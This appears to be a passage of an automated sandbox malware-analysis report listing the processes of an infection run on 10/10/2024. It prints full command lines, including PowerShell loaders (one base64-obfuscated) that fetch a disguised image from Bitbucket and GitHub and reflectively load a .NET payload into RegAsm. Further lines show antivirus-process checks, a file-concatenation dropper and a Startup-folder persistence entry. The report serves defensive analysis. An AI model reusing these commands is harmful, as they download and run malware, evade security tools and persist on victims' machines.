                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                        Imagebase:0x7ff70f010000
                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                        Start time:07:39:32
                                                                                                                                                                                        Start date:10/10/2024
                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] (' txt.crijFkF/sdaolnwod/fwf/wfsfwf/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                                                                                                                                                                                        Imagebase:0x7ff760310000
                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                        Start time:07:39:40
                                                                                                                                                                                        Start date:10/10/2024
                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                        Imagebase:0x2e0000
                                                                                                                                                                                        File size:65'440 bytes
                                                                                                                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                        Start time:07:39:40
                                                                                                                                                                                        Start date:10/10/2024
                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                        Imagebase:0xe90000
                                                                                                                                                                                        File size:65'440 bytes
                                                                                                                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                        Start time:07:39:45
                                                                                                                                                                                        Start date:10/10/2024
                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXE
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXE
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        File size:1'308'110 bytes
                                                                                                                                                                                        MD5 hash:5699D5B44379624EBC78078A1B85E18C
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                        Start time:07:39:46
                                                                                                                                                                                        Start date:10/10/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c move Kits Kits.bat & Kits.bat
                                                                                                                                                                                        Imagebase:0xc50000
                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                        Start time:07:39:46
                                                                                                                                                                                        Start date:10/10/2024
                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                        Imagebase:0x7ff70f010000
                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:15
                                                                                                                                                                                        Start time:07:39:47
                                                                                                                                                                                        Start date:10/10/2024
                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\MicrosoftServiceUpdater.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\MicrosoftServiceUpdater.exe
                                                                                                                                                                                        Imagebase:0x7ff636340000
                                                                                                                                                                                        File size:184'320 bytes
                                                                                                                                                                                        MD5 hash:1B8A04E03B265D0397C024B692E25C6E
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                        Start time:07:39:47
                                                                                                                                                                                        Start date:10/10/2024
                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:cmd /c one.vbs
                                                                                                                                                                                        Imagebase:0x7ff684a30000
                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                        Start time:07:39:47
                                                                                                                                                                                        Start date:10/10/2024
                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                        Imagebase:0x7ff70f010000
                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:18
                                                                                                                                                                                        Start time:07:39:48
                                                                                                                                                                                        Start date:10/10/2024
                                                                                                                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP001.TMP\one.vbs"
                                                                                                                                                                                        Imagebase:0x7ff6e26d0000
                                                                                                                                                                                        File size:170'496 bytes
                                                                                                                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:19
                                                                                                                                                                                        Start time:07:39:48
                                                                                                                                                                                        Start date:10/10/2024
                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##g#D0#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#GI#YQBz#GU#Ng#0#EM#bwBt#G0#YQBu#GQ#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Cw#I##k#GI#YQBz#GU#Ng#0#Ew#ZQBu#Gc#d#Bo#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#GI#YQBz#GU#Ng#0#EM#bwBt#G0#YQBu#GQ#KQ#7#C##J#Bs#G8#YQBk#GU#Z#BB#HM#cwBl#G0#YgBs#Hk#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#YwBv#G0#bQBh#G4#Z#BC#Hk#d#Bl#HM#KQ#7#C##J#B0#Hk#c#Bl#C##PQ#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C4#RwBl#HQ#V#B5#H##ZQ#o#Cc#d#Bl#HM#d#Bw#G8#dwBl#HI#cwBo#GU#b#Bs#C4#S#Bv#G0#ZQ#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bt#GU#d#Bo#G8#Z##g#D0#I##k#HQ#eQBw#GU#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#b#Bh#Cc#KQ#u#Ek#bgB2#G8#awBl#Cg#J#Bu#HU#b#Bs#Cw#I#Bb#G8#YgBq#GU#YwB0#Fs#XQBd#C##K##n#C##d#B4#HQ#LgBt#H##YwBm#FM#bgBr#C8#cwBk#GE#bwBs#G4#dwBv#GQ#LwBm#Hc#Zg#v#Hc#ZgBz#GY#dwBm#C8#ZwBy#G8#LgB0#GU#awBj#HU#YgB0#Gk#Yg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                                                                                                                                                                                        Imagebase:0x7ff760310000
                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        Target ID:20
                                                                                                                                                                                        Start time:07:39:48
                                                                                                                                                                                        Start date:10/10/2024
                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                        Imagebase:0x7ff70f010000
                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        Target ID:21
                                                                                                                                                                                        Start time:07:39:49
                                                                                                                                                                                        Start date:10/10/2024
                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] (' txt.mpcfSnk/sdaolnwod/fwf/wfsfwf/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                                                                                                                                                                                        Imagebase:0x7ff760310000
                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:22
                                                                                                                                                                                        Start time:07:39:51
                                                                                                                                                                                        Start date:10/10/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:tasklist
                                                                                                                                                                                        Imagebase:0x610000
                                                                                                                                                                                        File size:79'360 bytes
                                                                                                                                                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:23
                                                                                                                                                                                        Start time:07:39:51
                                                                                                                                                                                        Start date:10/10/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:findstr /I "wrsa opssvc"
                                                                                                                                                                                        Imagebase:0x2d0000
                                                                                                                                                                                        File size:29'696 bytes
                                                                                                                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:24
                                                                                                                                                                                        Start time:07:39:53
                                                                                                                                                                                        Start date:10/10/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:tasklist
                                                                                                                                                                                        Imagebase:0x7ff70f010000
                                                                                                                                                                                        File size:79'360 bytes
                                                                                                                                                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:25
                                                                                                                                                                                        Start time:07:39:53
                                                                                                                                                                                        Start date:10/10/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                                                                                                                                                                        Imagebase:0x2d0000
                                                                                                                                                                                        File size:29'696 bytes
                                                                                                                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:26
                                                                                                                                                                                        Start time:07:39:55
                                                                                                                                                                                        Start date:10/10/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:cmd /c md 603423
                                                                                                                                                                                        Imagebase:0xc50000
                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:27
                                                                                                                                                                                        Start time:07:39:55
                                                                                                                                                                                        Start date:10/10/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:findstr /V "speechesdjexpandingsoviet" Controllers
                                                                                                                                                                                        Imagebase:0x2d0000
                                                                                                                                                                                        File size:29'696 bytes
                                                                                                                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:28
                                                                                                                                                                                        Start time:07:39:55
                                                                                                                                                                                        Start date:10/10/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:cmd /c copy /b ..\Southampton + ..\Transition + ..\Mars + ..\Paying + ..\Clay + ..\Usually + ..\Fighters + ..\Disposition + ..\Models + ..\Semester s
                                                                                                                                                                                        Imagebase:0xc50000
                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:29
                                                                                                                                                                                        Start time:07:39:56
                                                                                                                                                                                        Start date:10/10/2024
                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\603423\Lucas.pif
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:Lucas.pif s
                                                                                                                                                                                        Imagebase:0x690000
                                                                                                                                                                                        File size:893'608 bytes
                                                                                                                                                                                        MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                        • Detection: 5%, ReversingLabs
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        Target ID:30
                                                                                                                                                                                        Start time:07:39:56
                                                                                                                                                                                        Start date:10/10/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:choice /d y /t 5
                                                                                                                                                                                        Imagebase:0x5b0000
                                                                                                                                                                                        File size:28'160 bytes
                                                                                                                                                                                        MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:31
                                                                                                                                                                                        Start time:07:39:57
                                                                                                                                                                                        Start date:10/10/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoCraft.url" & echo URL="C:\Users\user\AppData\Local\DesignInno Innovations\InnoCraft.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoCraft.url" & exit
                                                                                                                                                                                        Imagebase:0xc50000
                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:32
                                                                                                                                                                                        Start time:07:39:57
                                                                                                                                                                                        Start date:10/10/2024
                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                        Imagebase:0x7ff70f010000
                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
